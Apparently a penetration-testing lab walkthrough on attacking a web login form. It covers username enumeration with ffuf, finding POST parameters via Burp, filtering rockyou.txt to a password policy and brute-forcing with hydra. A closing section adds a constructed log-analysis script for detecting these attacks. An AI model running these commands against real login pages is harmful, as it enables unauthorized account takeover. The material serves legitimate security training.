HYDRA
01.USER ENUMERATION
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
username: invalid
password: invalid
* error: "Unknown user"
#automate the process of enumerating usernames
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@oco:~$ ffuf -w xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
* -w sets the wordlist to use
* -u sets the target URL and page
* -X POST sets the HTTP method to use
* -H adds a custom header to the HTTP requests
 - the Content-Type application/x-www-form-urlencoded is the encoding normally used when a browser submits form data
* -d sets the request body (FUZZ is replaced with each entry from the wordlist)
* -fr filters out results whose response matches a regular expression
 - if the string "Unknown user" appears in the HTTP response, that result is excluded from the output, so only usernames that produced a different response remain
#after identifying valid usernames, proceed by attempting to brute-force the user's password
02.IDENTIFY ERROR MESSAGE
root@oco:~$ BROWSER > {targetSite:port}
username field: {arbitraryValue}
password field: {arbitraryValue}
* submit the form and note the error message returned
#identified incorrect credential messages
* "Unknown user"
* "Invalid credentials"
03.IDENTIFY POST PARAMETERS
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
username field: {arbitraryValue}
password field: {arbitraryValue}
* submit the expected user input
POST /index.php HTTP/1.1
Host: 83.136.254.158:51572
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=2j030ocgj9kbs0a18lai9m6dvg

username=test&password=test
* identified post parameters as username=x&password=x
04.CRAFT CUSTOM PWLIST
#tailor the password list to the organization's password policy (if known)
Minimum Length: 10 characters
Must Include:
 - At least one uppercase letter
 - At least one lowercase letter
 - At least one number
#filter rockyou.txt down to the entries that satisfy this policy
root@oco:~$ cp /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt .
root@oco:~$ wc -l rockyou.txt
* 14344391
root@oco:~$ grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > customPWList.txt
root@oco:~$ wc -l customPWList.txt
* 151647
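#brute-force the passwords of the enumerated users with the filtered password list
root@oco:~$ hydra -L usernames.txt -P customPWList.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
* the -L represents the file of usernames and the -P the file of passwords
* the -s represents the target port
* the -f stops the run after the first valid username/password pair is found
* the http-post-form string has three colon-separated parts: the form path, the POST body (^USER^ and ^PASS^ are substituted per attempt) and the failure string that marks a rejected login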
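#defender's view (added example, not part of the original notes): the enumeration phase shows up in a login log as one source hitting many non-existent usernames, and the password phase as one source failing repeatedly against a single existing account. The log format (time src_ip username outcome), the sample lines, the thresholds and the function names below are all constructed assumptions.

```shell
# Constructed sample login log. Assumed format: time src_ip username outcome
sample_log() {
cat <<'EOF'
2024-01-01T10:00:01Z 10.0.0.5 admin unknown_user
2024-01-01T10:00:01Z 10.0.0.5 root unknown_user
2024-01-01T10:00:02Z 10.0.0.5 test unknown_user
2024-01-01T10:00:02Z 10.0.0.5 jane invalid_credentials
2024-01-01T10:00:03Z 10.0.0.5 guest unknown_user
2024-01-01T10:05:10Z 10.0.0.9 jane invalid_credentials
2024-01-01T10:05:10Z 10.0.0.9 jane invalid_credentials
2024-01-01T10:05:11Z 10.0.0.9 jane invalid_credentials
2024-01-01T10:05:11Z 10.0.0.9 jane invalid_credentials
2024-01-01T10:05:12Z 10.0.0.9 jane ok
2024-01-01T11:00:00Z 10.0.0.20 bob invalid_credentials
2024-01-01T11:00:30Z 10.0.0.20 bob ok
EOF
}

# classify_sources ENUM_MIN BRUTE_MIN   (hypothetical helper; log on stdin)
# Prints "<ip> enumeration" when one source tried at least ENUM_MIN
# distinct usernames that do not exist, and "<ip> bruteforce:<user>"
# when one source produced at least BRUTE_MIN wrong-password failures
# against a single existing account.
classify_sources() {
  awk -v enum_min="$1" -v brute_min="$2" '
    $4 == "unknown_user" {
      # count each (source, username) pair only once
      if (!(($2, $3) in seen)) { seen[$2, $3] = 1; distinct[$2]++ }
    }
    $4 == "invalid_credentials" { fails[$2 " " $3]++ }
    END {
      for (ip in distinct)
        if (distinct[ip] >= enum_min) print ip, "enumeration"
      for (k in fails)
        if (fails[k] >= brute_min) {
          split(k, p, " ")
          print p[1], "bruteforce:" p[2]
        }
    }' | sort
}

sample_log | classify_sources 4 4
```

#a single mistyped password (10.0.0.20) stays below both thresholds and is not reported; returning the same message for an unknown user and a wrong password removes the first signal's cause altogether.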